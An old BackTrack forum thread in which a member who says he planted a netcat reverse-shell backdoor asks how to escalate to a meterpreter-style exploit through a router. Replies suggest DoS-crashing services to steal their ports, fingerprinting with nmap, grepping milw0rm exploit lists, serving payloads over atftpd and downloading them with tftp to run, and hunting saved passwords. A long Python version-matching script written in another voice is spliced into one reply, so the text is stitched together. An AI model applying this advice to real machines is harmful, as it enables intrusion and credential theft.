Thread: Install exploitable content

  1. #1
    Junior Member (Join Date: Mar 2008, Posts: 28)

    Install exploitable content

    Hey, I was just wondering if there was anything you could do from command prompt in Windows that could be exploited.
    By that I mean I've made a netcat backdoor, loaded it on my Windows box right, gotten it to reverse connect to BackTrack, and now I have root access, yay,
    but you see I like the meterpreter dealio, so I was wondering if there was anything you could upload and run or try to connect back to BackTrack with something that you could exploit, not sure. I was able to exploit netcat110_nt while in my own network, but when I try to do that from outside my network my router is blocking the port I need to exploit, you see my problem.. any help would be grateful,

  2. #2
    Just burned his ISO (Join Date: Jun 2008, Posts: 14)

    So what do you want?
    To get around port blocking, if you're trying a reverse connection from your Windows box to your BT box, then you would want to use port 80 probably, as it's 99.9% of the time not blocked. If you're trying to forward connect to your Windows box, then you would have to either hack the router, or find a web service that's running on that box (and the router forwards to it), crash it (with a DOS attack probably) and have your service steal the port it was listening on.

    Hope this helps

  3. #3
    Junior Member (Join Date: Mar 2008, Posts: 28)

    How do you do a DOS attack, got any good links? Yeah, I've tried that port 80 thing, doesn't work.. I'm trying to find a service that from the Windows box connects to BackTrack, like tftp or telnet or anything that connects out of the Windows box so that it passes through the router, and then I can exploit it,

  4. #4
    Just burned his ISO (Join Date: Jun 2008, Posts: 14)

    For a DOS attack, you would want to get the service version and OS info using a tool like nmap (e.g. nmap -sV -O <host>), then find a working exploit for that service (e.g. from milw0rm).

    As an example

    Code:
    bt ~ # nmap -sV -O 127.0.0.1
    
    Starting Nmap 4.50 ( http://insecure.org ) at 2008-06-20 16:08 GMT
    Interesting ports on bt.example.net (127.0.0.1):
    Not shown: 1706 closed ports
    PORT     STATE SERVICE   VERSION
    25/tcp   open  smtp      Sendmail 8.14.1/8.14.1
    80/tcp   open  http      Apache httpd 2.2.4 ((Unix) DAV/2)
    587/tcp  open  smtp      Sendmail 8.14.1/8.14.1
    5800/tcp open  vnc-http?
    5900/tcp open  vnc       VNC (protocol 3.3)
    Device type: general purpose
    Running: Linux 2.6.X
    OS details: Linux 2.6.17 - 2.6.21
    Uptime: 0.134 days (since Fri Jun 20 12:57:01 2008)
    Network Distance: 0 hops
    Service Info: OS: Unix
    
    OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 35.536 seconds
    
    bt ~ # cd /pentest/exploits/milw0rm/
    bt milw0rm # cat sploitlist.txt | grep -i sendmail
    ./platforms/linux/remote/24.c Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
    ./platforms/linux/local/411.c Sendmail 8.11.x Exploit (i386-Linux)
    ./platforms/linux/dos/2051.py Sendmail <= 8.13.5 Remote Signal Handling Exploit PoC
    ./platforms/multiple/remote/4761.pl Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
    ./rport/25/24.c Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
    ./rport/25/4761.pl Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
    bt milw0rm #
    However, as you can see, there are no exploits for my version of sendmail, so this technique won't always work.

    If you want to use tftp to make the windows box download something from you, you'll need to start a tftp server on your backtrack box first. So put your file in /tmp then:

    Code:
    atftpd --daemon --port 69 /tmp
    And on your windows machine:

    Code:
    tftp -i <yourip> GET <filename>
    Now you can simply execute the file on your windows box.

    When you're done, do
    Code:
    killall atftpd
    to stop the tftp server
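As an added example (my own code, not from this thread or from BackTrack), here is a Python version of the triage in the post above: it parses the `nmap -sV` port table, parses the affected-version range written into each sploitlist.txt line, and compares the two numerically instead of grepping on the product name alone, which is exactly why the grep returned four Sendmail hits while none of them applied to 8.14.1. The same check works from the defender's side: feed it a scan of your own hosts and an advisory's affected range and it tells you which services are actually in range. The sample nmap table and sploitlist lines are constructed from the output quoted above; the status names and the handling of "X with Y < version" entries are my assumptions about the list format.

```python
import re

# Constructed sample input: the port table from the nmap -sV -O run quoted above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE   VERSION
25/tcp   open  smtp      Sendmail 8.14.1/8.14.1
80/tcp   open  http      Apache httpd 2.2.4 ((Unix) DAV/2)
587/tcp  open  smtp      Sendmail 8.14.1/8.14.1
5800/tcp open  vnc-http?
5900/tcp open  vnc       VNC (protocol 3.3)
"""

# Constructed sample input: the sploitlist.txt lines the grep above returned.
SPLOITLIST = """\
./platforms/linux/remote/24.c Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
./platforms/linux/local/411.c Sendmail 8.11.x Exploit (i386-Linux)
./platforms/linux/dos/2051.py Sendmail <= 8.13.5 Remote Signal Handling Exploit PoC
./platforms/multiple/remote/4761.pl Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
VERSION = re.compile(r"\d+(?:\.\d+)+")
# An entry's affected range: "<= 8.12.8", a family like "8.11.x", or a bare version.
CONSTRAINT = re.compile(r"(<=|>=|<|>)\s*(\d+(?:\.\d+)*)|(\d+(?:\.\d+)*)\.x\b|\b(\d+(?:\.\d+)+)\b")
OPS = {"<=": lambda v, b: v <= b, "<": lambda v, b: v < b, ">=": lambda v, b: v >= b,
       ">": lambda v, b: v > b, "==": lambda v, b: v == b,
       "family": lambda v, b: v[:len(b)] == b}   # 8.11.x covers every 8.11.*


def parse_version(s):
    """'8.14.1' -> (8, 14, 1), so versions compare numerically rather than as strings."""
    return tuple(int(p) for p in s.split("."))


def parse_nmap_services(text):
    """One dict per open port with the product name and version nmap reported."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m or m.group(3) != "open":
            continue
        port, proto, _, service, detail = m.groups()
        v = VERSION.search(detail)
        if not v:  # nmap could not fingerprint it (e.g. "vnc-http?"): nothing to compare
            services.append(dict(port=int(port), proto=proto, service=service,
                                 product=detail.strip() or None, version=None))
            continue
        # Product is the text before the version, minus a parenthetical such as "(protocol".
        product = re.split(r"\s*\(", detail[:v.start()])[0].strip()
        services.append(dict(port=int(port), proto=proto, service=service,
                             product=product, version=parse_version(v.group())))
    return services


def parse_sploitlist(text):
    """Split 'path description' lines and pull the affected-version range out of each."""
    entries = []
    for line in filter(str.strip, text.splitlines()):
        path, _, desc = line.partition(" ")
        m = CONSTRAINT.search(desc)
        name = desc[:m.start()].strip() if m else desc.strip()
        # "Sendmail with clamav-milter < 0.91.2": the bound is on the plugin, not Sendmail.
        product, _, component = name.partition(" with ")
        if not m:
            op, bound = None, None
        elif m.group(1):
            op, bound = m.group(1), parse_version(m.group(2))
        elif m.group(3):
            op, bound = "family", parse_version(m.group(3))
        else:
            op, bound = "==", parse_version(m.group(4))
        entries.append(dict(path=path, product=product, component=component or None,
                            op=op, bound=bound))
    return entries


def assess(nmap_text, sploitlist_text):
    """Name-match like the grep above, then classify each hit by the observed version."""
    results = []
    entries = parse_sploitlist(sploitlist_text)
    for svc in parse_nmap_services(nmap_text):
        if not svc["product"]:
            continue
        for e in entries:
            if e["product"].lower() not in svc["product"].lower():
                continue  # a grep on the product name would not have listed this either
            if e["component"] or svc["version"] is None or e["op"] is None:
                status = "check_manually"  # range is on something nmap did not version
            elif OPS[e["op"]](svc["version"], e["bound"]):
                status = "affected"
            else:
                status = "not_affected"
            results.append(dict(port=svc["port"], product=svc["product"],
                                version=svc["version"], path=e["path"], status=status))
    return results


def summarize(results):
    """Hits per status; the grep alone would only have told you len(results)."""
    return {s: sum(1 for r in results if r["status"] == s)
            for s in ("affected", "not_affected", "check_manually")}


if __name__ == "__main__":  # run stand-alone: print each hit and the per-status counts
    hits = assess(NMAP_OUTPUT, SPLOITLIST)
    print(*hits, summarize(hits), sep="\n")
```

On the quoted scan this reports eight name matches (four entries, on both port 25 and port 587) but zero in the affected range, plus two "check_manually" hits for the clamav-milter entry, whose bound is on a plugin whose version nmap does not report. The version tuple comparison is what keeps 8.14.1 from being treated as "less than" 8.9 the way a plain string compare would.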

  5. #5
    Junior Member (Join Date: Mar 2008, Posts: 28)

    Cool, thanks.. but what I'm trying to say is, when I nmap I get nothing because I'm trying to audit through my router, and there's nothing, so I thought if I start a service from the inside then I could exploit it, but the question is what service, I have command prompt so that's kinda limited, or maybe upload a service and run that, the question is really what service can I exploit upon reverse connection..

  6. #6
    Senior Member ShadowKill (Join Date: Dec 2007, Posts: 908)

    Quote Originally Posted by CrispyJones:
    Cool, thanks.. but what I'm trying to say is, when I nmap I get nothing because I'm trying to audit through my router, and there's nothing, so I thought if I start a service from the inside then I could exploit it, but the question is what service, I have command prompt so that's kinda limited, or maybe upload a service and run that, the question is really what service can I exploit upon reverse connection..
    There is a VERY long list of exploitable services ranging to specific releases to entire generations of software. Google is your friend, do your homework on exploitable services first, try some things out, and then come back if you have any issues, or simply come back to say "Hey, I figured it out! This is what I did....."

    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  7. #7
    Just burned his ISO (Join Date: Jun 2008, Posts: 14)

    So you have your remote shell, and I presume that outbound port 80 is allowed? If so then it should be possible to start an atftpd server on port 80 and get the Windows machine to download from it. If port 80 UDP is filtered then you will need another method (idk to be honest, I don't use the Windows command prompt much. If it was a Linux shell, you could start apache and wget your exploit). If your BT box is behind a router, then you will need to do some port forwarding on that.

    Apart from that, the best you can probably do is explore the filesystem, find software versions, and see if you can find any exploits for them. You could also search for saved passwords (like for your router's web interface etc...). I can't remember the Windows registry commands but if you google for them I'm sure they would be helpful.

  8. #8
    Junior Member (Join Date: Mar 2008, Posts: 28)

    Thanks, that helps. Windows does have wget, I'll have to give that a try.

  9. #9
    Just burned his ISO (Join Date: Jun 2008, Posts: 14)

    You learn something every day
    Should do the trick
